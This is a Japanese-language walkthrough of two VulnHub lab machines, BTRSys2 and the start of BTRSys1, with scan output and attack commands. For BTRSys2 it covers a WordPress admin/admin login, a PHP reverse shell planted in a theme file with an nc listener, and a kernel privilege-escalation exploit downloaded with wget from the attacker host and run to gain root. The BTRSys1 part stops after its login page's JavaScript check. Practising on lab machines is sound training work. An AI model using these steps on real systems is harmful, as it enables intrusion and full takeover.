vulnhub BTRSys2 v2.1 雑記
BTRSys2
google driveからのダウンロードファイル解凍後のovfファイルが上手く動かなかった。
vulnhub.comのダウンロードファイルのovfは上手く動いてくれた。
ip取得が上手くいかなかったので、
起動時に「recovery mode」を選択して、「network Enable networking」を選択するとリンクアップした。
サービス調査
# nmap -p- 10.10.10.13 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:21 EDT Nmap scan report for 10.10.10.13 Host is up (0.00015s latency). Not shown: 65532 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds # nmap -p21,22,80 -sV --version-all 10.10.10.13 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:22 EDT Nmap scan report for 10.10.10.13 Host is up (0.00051s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
気になりどころ
- [port 21] ftp vsftpd 3.0.3
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
詳細
[port 21] ftp vsftpd 3.0.3
# searchsploit vsftpd
----------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
特に無し。
# ftp 10.10.10.13 Connected to 10.10.10.13. 220 (vsFTPd 3.0.3) Name (10.10.10.13:root): 331 Please specify the password. Password: l530 Login incorrect. Login failed. ftp> ls 530 Please login with USER and PASS.
ログイン必要なので終了。
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
このバージョン以前にも見たけど、Username Enumerationにしかexploit無いし精度低かった気がする。
終。
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.13 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.13 + Target Hostname: 10.10.10.13 + Target Port: 80 + Start Time: 2020-05-11 07:30:36 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 2 entries which should be manually viewed. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 51, size: 54e208f152180, mtime: gzip + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST + OSVDB-3233: /icons/README: Apache default file found. + 7865 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-05-11 07:31:40 (GMT-4) (64 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
robots.txtが気になる。
# dirb http://10.10.10.13
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 11 07:32:16 2020
URL_BASE: http://10.10.10.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.13/ ----
+ http://10.10.10.13/index.html (CODE:200|SIZE:81)
==> DIRECTORY: http://10.10.10.13/javascript/
+ http://10.10.10.13/LICENSE (CODE:200|SIZE:1672)
+ http://10.10.10.13/robots.txt (CODE:200|SIZE:1451)
+ http://10.10.10.13/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://10.10.10.13/upload/
==> DIRECTORY: http://10.10.10.13/wordpress/
---- Entering directory: http://10.10.10.13/javascript/ ----
==> DIRECTORY: http://10.10.10.13/javascript/jquery/
---- Entering directory: http://10.10.10.13/upload/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/
==> DIRECTORY: http://10.10.10.13/upload/admins/
==> DIRECTORY: http://10.10.10.13/upload/framework/
==> DIRECTORY: http://10.10.10.13/upload/include/
+ http://10.10.10.13/upload/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/languages/
==> DIRECTORY: http://10.10.10.13/upload/media/
==> DIRECTORY: http://10.10.10.13/upload/modules/
==> DIRECTORY: http://10.10.10.13/upload/page/
==> DIRECTORY: http://10.10.10.13/upload/search/
==> DIRECTORY: http://10.10.10.13/upload/temp/
==> DIRECTORY: http://10.10.10.13/upload/templates/
---- Entering directory: http://10.10.10.13/wordpress/ ----
+ http://10.10.10.13/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-includes/
+ http://10.10.10.13/wordpress/xmlrpc.php (CODE:200|SIZE:42)
---- Entering directory: http://10.10.10.13/javascript/jquery/ ----
+ http://10.10.10.13/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://10.10.10.13/upload/account/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/css/
+ http://10.10.10.13/upload/account/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/account/templates/
---- Entering directory: http://10.10.10.13/upload/admins/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/access/
==> DIRECTORY: http://10.10.10.13/upload/admins/addons/
==> DIRECTORY: http://10.10.10.13/upload/admins/admintools/
==> DIRECTORY: http://10.10.10.13/upload/admins/groups/
+ http://10.10.10.13/upload/admins/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/admins/interface/
==> DIRECTORY: http://10.10.10.13/upload/admins/languages/
==> DIRECTORY: http://10.10.10.13/upload/admins/login/
==> DIRECTORY: http://10.10.10.13/upload/admins/logout/
==> DIRECTORY: http://10.10.10.13/upload/admins/media/
==> DIRECTORY: http://10.10.10.13/upload/admins/modules/
==> DIRECTORY: http://10.10.10.13/upload/admins/pages/
==> DIRECTORY: http://10.10.10.13/upload/admins/preferences/
==> DIRECTORY: http://10.10.10.13/upload/admins/profiles/
==> DIRECTORY: http://10.10.10.13/upload/admins/service/
==> DIRECTORY: http://10.10.10.13/upload/admins/settings/
==> DIRECTORY: http://10.10.10.13/upload/admins/start/
==> DIRECTORY: http://10.10.10.13/upload/admins/support/
==> DIRECTORY: http://10.10.10.13/upload/admins/templates/
==> DIRECTORY: http://10.10.10.13/upload/admins/users/
---- Entering directory: http://10.10.10.13/upload/framework/ ----
==> DIRECTORY: http://10.10.10.13/upload/framework/functions/
+ http://10.10.10.13/upload/framework/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/include/ ----
+ http://10.10.10.13/upload/include/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/include/yui/
---- Entering directory: http://10.10.10.13/upload/languages/ ----
+ http://10.10.10.13/upload/languages/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/media/ ----
+ http://10.10.10.13/upload/media/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/ ----
+ http://10.10.10.13/upload/modules/admin.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/news/
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/
---- Entering directory: http://10.10.10.13/upload/page/ ----
+ http://10.10.10.13/upload/page/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/page/posts/
---- Entering directory: http://10.10.10.13/upload/search/ ----
+ http://10.10.10.13/upload/search/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/temp/ ----
+ http://10.10.10.13/upload/temp/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/temp/search/
---- Entering directory: http://10.10.10.13/upload/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/templates/blank/
+ http://10.10.10.13/upload/templates/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/ ----
+ http://10.10.10.13/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/css/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/images/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/includes/
+ http://10.10.10.13/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/js/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/maint/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/network/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/user/
---- Entering directory: http://10.10.10.13/wordpress/wp-content/ ----
+ http://10.10.10.13/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/plugins/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/themes/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/upgrade/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/uploads/
---- Entering directory: http://10.10.10.13/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/upload/account/css/ ----
+ http://10.10.10.13/upload/account/css/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/account/templates/ ----
+ http://10.10.10.13/upload/account/templates/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/access/ ----
+ http://10.10.10.13/upload/admins/access/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/addons/ ----
+ http://10.10.10.13/upload/admins/addons/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/admintools/ ----
+ http://10.10.10.13/upload/admins/admintools/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/groups/ ----
+ http://10.10.10.13/upload/admins/groups/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/interface/ ----
+ http://10.10.10.13/upload/admins/interface/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/languages/ ----
+ http://10.10.10.13/upload/admins/languages/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/login/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/login/forgot/
+ http://10.10.10.13/upload/admins/login/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/logout/ ----
+ http://10.10.10.13/upload/admins/logout/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/media/ ----
+ http://10.10.10.13/upload/admins/media/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/modules/ ----
+ http://10.10.10.13/upload/admins/modules/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/pages/ ----
+ http://10.10.10.13/upload/admins/pages/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/preferences/ ----
+ http://10.10.10.13/upload/admins/preferences/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/profiles/ ----
+ http://10.10.10.13/upload/admins/profiles/index.php (CODE:500|SIZE:0)
---- Entering directory: http://10.10.10.13/upload/admins/service/ ----
+ http://10.10.10.13/upload/admins/service/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/settings/ ----
+ http://10.10.10.13/upload/admins/settings/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/start/ ----
+ http://10.10.10.13/upload/admins/start/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/support/ ----
+ http://10.10.10.13/upload/admins/support/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/templates/ ----
+ http://10.10.10.13/upload/admins/templates/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/users/ ----
+ http://10.10.10.13/upload/admins/users/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/framework/functions/ ----
+ http://10.10.10.13/upload/framework/functions/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/include/yui/ ----
==> DIRECTORY: http://10.10.10.13/upload/include/yui/event/
+ http://10.10.10.13/upload/include/yui/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/include/yui/README (CODE:200|SIZE:8488)
==> DIRECTORY: http://10.10.10.13/upload/include/yui/yahoo/
---- Entering directory: http://10.10.10.13/upload/modules/news/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/css/
+ http://10.10.10.13/upload/modules/news/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/news/info.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/news/languages/
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/wysiwyg/info.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/languages/
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/templates/
---- Entering directory: http://10.10.10.13/upload/page/posts/ ----
+ http://10.10.10.13/upload/page/posts/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.13/upload/temp/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/upload/templates/blank/ ----
+ http://10.10.10.13/upload/templates/blank/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/templates/blank/info.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/network/ ----
+ http://10.10.10.13/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.13/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/user/ ----
+ http://10.10.10.13/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.13/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.13/wordpress/wp-content/plugins/ ----
+ http://10.10.10.13/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.10.13/wordpress/wp-content/themes/ ----
+ http://10.10.10.13/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.10.13/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/upload/admins/login/forgot/ ----
+ http://10.10.10.13/upload/admins/login/forgot/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/include/yui/event/ ----
+ http://10.10.10.13/upload/include/yui/event/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/include/yui/event/README (CODE:200|SIZE:9807)
---- Entering directory: http://10.10.10.13/upload/include/yui/yahoo/ ----
+ http://10.10.10.13/upload/include/yui/yahoo/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/include/yui/yahoo/README (CODE:200|SIZE:2889)
---- Entering directory: http://10.10.10.13/upload/modules/news/css/ ----
+ http://10.10.10.13/upload/modules/news/css/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/news/languages/ ----
+ http://10.10.10.13/upload/modules/news/languages/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/news/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/backend/
+ http://10.10.10.13/upload/modules/news/templates/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/languages/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/languages/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/templates/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/templates/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/news/templates/backend/ ----
+ http://10.10.10.13/upload/modules/news/templates/backend/index.php (CODE:500|SIZE:67)
-----------------
END_TIME: Mon May 11 07:34:12 2020
DOWNLOADED: 267496 - FOUND: 71
珍しく、情報量のとても多いdirb結果。
気になるディレクトリは主に「/upload/」と「/wordpress/」の二つ。
とりあえず、「/robots.txt」を確認する。
# curl 10.10.10.13/robots.txt Disallow: Hackers Allow: /wordpress/ .o+. :o/ -o+` /hh: shh` +hh- /hh: shh` -/: +hh- /hh: shh` +s+ +hh- /hh/............ `....shh-.... ...............` `-` `..............` +hh- .. /hhyyyyyyyyyyyyy/ `syyyyyhhyyyyy. -yyyyyyyyyyyyyyy/ oys +ssssssssssssss/ +hh- .+yy- /hh+---------/hh+ .----yhh:---- :hho------------` yhy` oyy------------` +hh- .+yys:` /hh: -hh+ shh` :hh+ yhy` oyy +hh- `.+yys/` /hh: -hh+ shh` :hh+ yhy` oss `-- +hhsssssyhy/` /hh: -hh+ shh` :hh+ yhy` `-. +yy. +hho+++osyy+. /hh: -hh+ shh` :hh+ yhy` +yy. +hh- `/syy+. /hho:::::::::+hh+ shh` :hh+ yhy` .::::::::::::oyy. +hh- `/yyy/` :yyyyyyyyyyyyyyy: +ys` .yy: oys +sssssssssssssss` /ys. `/sy- ``````````````` ` `` ` `````````````` ``
特に新たに得られた情報は無し。
改めてブラウザでホームページに接続してみると何か蠢いているgif
「/upload/」にアクセスすると、
Connection failed: SQLSTATE[HY000] [1049] Unknown database 'Lepton'
phpでmysqlの参照に失敗してる?
なんにしろこれ以上は「/upload/」にアクセスできない模様。
では、「/wordpress/」をチェック。
表示したページは本来のwordpressのデザインを読み込めていない?
Log in , admin
「Log in」があるので「admin/admin」でログイン試行。
あーログインできちゃったようなので、Appearance->Editorから簡単にアクセスできそうなphpを弄る。
お好みだけど、reverse-shellをsearch.phpにセットするのが分かりやすくて好き。
reverse-shellはいつもお世話になっているpentestmonkey産。
kaliならば、「/usr/share/webshells/php/php-reverse-shell.php」にある。
ここで、今回は「search.php」が動かなかったため(仕様?)、「comment.php」を改変してreverse-shellした。
window 1 # nc -nlvp 8080
firefoxから任意の記事にpostcommentする。
window 1 Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 14:43:02 up 1:24, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ whoami www-data $
shell getchu!
after shell getchu
kernel exploit
怪しいファイル全く見つからず、cron探しても目ぼしいものは無く。
仕方がないのでkernel exploit狙いでいく。
victim $ uname -a Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
attacker
# searchsploit ubuntu 4.4
----------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | exploits/linux/local/41458.c
(snip)
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
ささりそうな気がしたやつ。
「41458.c」を試す。
$ cd /tmp
$ ls
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ wget 10.10.10.3/41458.c
--2020-05-11 15:17:10-- http://10.10.10.3/41458.c
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16554 (16K) [text/plain]
Saving to: '41458.c'
0K .......... ...... 100% 46.3M=0s
2020-05-11 15:17:10 (46.3 MB/s) - '41458.c' saved [16554/16554]
$ ls
41458.c
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ gcc 41458.c
/bin/sh: 7: gcc: not found
えぇ、gcc無いんか。
コンパイル済みをダウンロードするか。
$ wget 10.10.10.3/a.out
--2020-05-11 15:18:07-- http://10.10.10.3/a.out
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23776 (23K) [application/octet-stream]
Saving to: 'a.out'
0K .......... .......... ... 100% 68.2M=0s
2020-05-11 15:18:07 (68.2 MB/s) - 'a.out' saved [23776/23776]
$ chmod 777 a.out
$ ./a.out
bash: cannot set terminal process group (1374): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
ちなみにこの後kernel panic起こした。
ttyでやっちゃったからかなぁ
「/usr/share/exploitdb/exploits/linux/local/44298.c」もroot取れた
こちらはkernel panic起こらず。
終わり
vulnhub BTRSys1 雑記
BTRSys1
サービス調査
# nmap -p- 10.10.10.12 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 06:59 EDT Nmap scan report for 10.10.10.12 Host is up (0.00031s latency). Not shown: 65532 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 18.49 seconds # nmap -p21,22,80 -sV --version-all 10.10.10.12 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 07:01 EDT Nmap scan report for 10.10.10.12 Host is up (0.00049s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds
気になりどころ
- [port 21] ftp vsftpd 3.0.2
- [port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.7 (Ubuntu)
詳細
[port 21] ftp vsftpd 3.0.2
# searchsploit vsftp
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
今後もvsfpdは殆ど刺さらなそう
[port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
OpenSSH < 6.6 SFTP (x64) - Command Execution | exploits/linux_x86-64/remote/45000.c OpenSSH < 6.6 SFTP - Command Execution | exploits/linux/remote/45001.py
何か刺さりそうな気がしたけど、SFTP無いし、sshのuserが分からん
[port 80] http Apache httpd 2.4.7 (Ubuntu)
# nikto -h 10.10.10.12
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.12
+ Target Hostname: 10.10.10.12
+ Target Port: 80
+ Start Time: 2020-05-08 07:37:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2020-05-08 07:38:28 (GMT-4) (75 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.12
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 9 02:08:34 2020
URL_BASE: http://10.10.10.12/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.12/ ----
==> DIRECTORY: http://10.10.10.12/assets/
+ http://10.10.10.12/index.php (CODE:200|SIZE:758)
==> DIRECTORY: http://10.10.10.12/javascript/
+ http://10.10.10.12/server-status (CODE:403|SIZE:291)
==> DIRECTORY: http://10.10.10.12/uploads/
---- Entering directory: http://10.10.10.12/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.12/javascript/ ----
==> DIRECTORY: http://10.10.10.12/javascript/jquery/
---- Entering directory: http://10.10.10.12/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.12/javascript/jquery/ ----
+ http://10.10.10.12/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://10.10.10.12/javascript/jquery/version (CODE:200|SIZE:5)
-----------------
END_TIME: Sat May 9 02:08:51 2020
DOWNLOADED: 13836 - FOUND: 4
apacheやphp自体には特に何も無さそう。
色々ディレクトリはあるが目ぼしいものは無く
どう考えても「/uploads/」には怪しさしかないのだが。
config.phpは単純なアクセスじゃ見れない。
login.phpは適当にやっても通らなさそう。
しかし、
# curl 10.10.10.12/login.php
(snip)
<div class="login-box">
<div class="lb-header">
<a href="#" class="active" id="login-box-link">Giris Yap</a>
</div>
<form method="Post" name="loginform" action="personel.php" class="email-login">
<div class="u-form-group">
<input type="email" id="user" name="kullanici_adi" placeholder="Kullanici Adi" required/>
</div>
<div class="u-form-group">
<input type="password" id="pwd" name="parola" placeholder="Parola" required/>
</div>
<div class="u-form-group">
<input type="button" value="Giris" onclick="control();" />
</div>
</form>
</div>
<script type="text/javascript">
function control(){
var user = document.getElementById("user").value;
var pwd = document.getElementById("pwd").value;
var str=user.substring(user.lastIndexOf("@")+1,user.length);
if((pwd == "'")){
alert("Hack Denemesi !!!");
}
else if (str!="btrisk.com"){
alert("Yanlis Kullanici Bilgisi Denemektesiniz");
}
